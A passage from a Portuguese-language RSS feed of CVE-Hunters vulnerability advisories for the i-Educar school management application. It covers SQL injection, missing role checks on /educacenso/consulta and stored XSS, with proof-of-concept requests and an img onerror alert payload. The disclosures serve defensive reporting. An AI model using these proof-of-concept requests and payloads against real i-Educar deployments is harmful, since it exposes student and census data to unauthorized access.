&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9608/image.png&amp;#34;
	width=&amp;#34;1127&amp;#34;
	height=&amp;#34;1015&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9608/image_hu_2f4a07eb87effb6.png 480w, /p/cve-2025-9608/image_hu_4a2882fae48dd050.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9609</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9609/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9609/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9609-controle-de-acesso-em-nível-de-função-ausente-no-endpoint-educacensoconsulta&amp;#34;&amp;gt;CVE-2025-9609: Controle de acesso em nível de função ausente no endpoint &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; do aplicativo i-Educar. Esse problema permite que usuários autenticados sem a função necessária acessem funcionalidades ou dados que deveriam ser restritos, resultando em elevação de privilégio e acesso não autorizado.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Endpoint Vulnerável:&amp;lt;/strong&amp;gt; &amp;lt;code&amp;gt;GET /educacenso/consulta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Autenticação:&amp;lt;/strong&amp;gt; Obrigatória (mas verificações de autorização insuficientes)&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9609-controle-de-acesso-em-nível-de-função-ausente-no-endpoint-educacensoconsulta&amp;#34;&amp;gt;CVE-2025-9609: Controle de acesso em nível de função ausente no endpoint &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; do aplicativo i-Educar. Esse problema permite que usuários autenticados sem a função necessária acessem funcionalidades ou dados que deveriam ser restritos, resultando em elevação de privilégio e acesso não autorizado.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Endpoint Vulnerável:&amp;lt;/strong&amp;gt; &amp;lt;code&amp;gt;GET /educacenso/consulta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Autenticação:&amp;lt;/strong&amp;gt; Obrigatória (mas verificações de autorização insuficientes)&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Função necessária:&amp;lt;/strong&amp;gt; Acesso somente ao aplicativo&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Cenário afetado:&amp;lt;/strong&amp;gt; Um usuário sem a função necessária ainda consegue acessar diretamente o endpoint.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue aplicar o controle de acesso baseado em função (RBAC) adequado no endpoint &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt;. Como resultado, usuários com níveis de privilégio mais baixos podem acessar dados e funcionalidades confidenciais que deveriam ser restritos a funções com privilégios mais altos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Solicitação usando uma sessão de um usuário sem a função Educacenso:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /educacenso/consulta HTTP/1.1 Host: &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;target&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; Cookie: PHPSESSID=&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;low_privileged_session&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9609/image.png&amp;#34;
	width=&amp;#34;1575&amp;#34;
	height=&amp;#34;708&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9609/image_hu_342a2b269456c359.png 480w, /p/cve-2025-9609/image_hu_78d6f5df22994203.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Resultado observado:&amp;lt;/strong&amp;gt; O servidor responde com HTTP 200 e retorna conteúdo restrito.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Resultado esperado:&amp;lt;/strong&amp;gt; O servidor deve responder com HTTP 403 (Forbidden).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais do censo educacional;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégio de um usuário básico para funções com acesso a módulos restritos;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível manipulação de dados confidenciais se operações de gravação estiverem acessíveis;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação da confidencialidade e integridade de informações protegidas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violações de conformidade se dados pessoais confidenciais forem expostos a usuários não autorizados.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9652</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9652/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9652/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9652-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_transferencia_tipo_cadphp&amp;#34;&amp;gt;CVE-2025-9652: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9652-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_transferencia_tipo_cadphp&amp;#34;&amp;gt;CVE-2025-9652: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Outro Endpoint Afetado: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_det.php?cod_transferencia_tipo=[id]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image.png&amp;#34;
	width=&amp;#34;741&amp;#34;
	height=&amp;#34;592&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image_hu_c6ccac438811cb73.png 480w, /p/cve-2025-9652/image_hu_f23a6e3e10957c05.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;125&amp;#34;
		data-flex-basis=&amp;#34;300px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-1.png&amp;#34;
	width=&amp;#34;738&amp;#34;
	height=&amp;#34;341&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-1_hu_45b054bc4c59654b.png 480w, /p/cve-2025-9652/image-1_hu_4ed8f53b57d99036.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-2.png&amp;#34;
	width=&amp;#34;690&amp;#34;
	height=&amp;#34;281&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-2_hu_c194e94dc6a4b0fd.png 480w, /p/cve-2025-9652/image-2_hu_8375d7eb45ee1d31.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;245&amp;#34;
		data-flex-basis=&amp;#34;589px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-3.png&amp;#34;
	width=&amp;#34;661&amp;#34;
	height=&amp;#34;317&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-3_hu_8eb960a4b7cdc869.png 480w, /p/cve-2025-9652/image-3_hu_439d0daf74e59258.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;208&amp;#34;
		data-flex-basis=&amp;#34;500px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
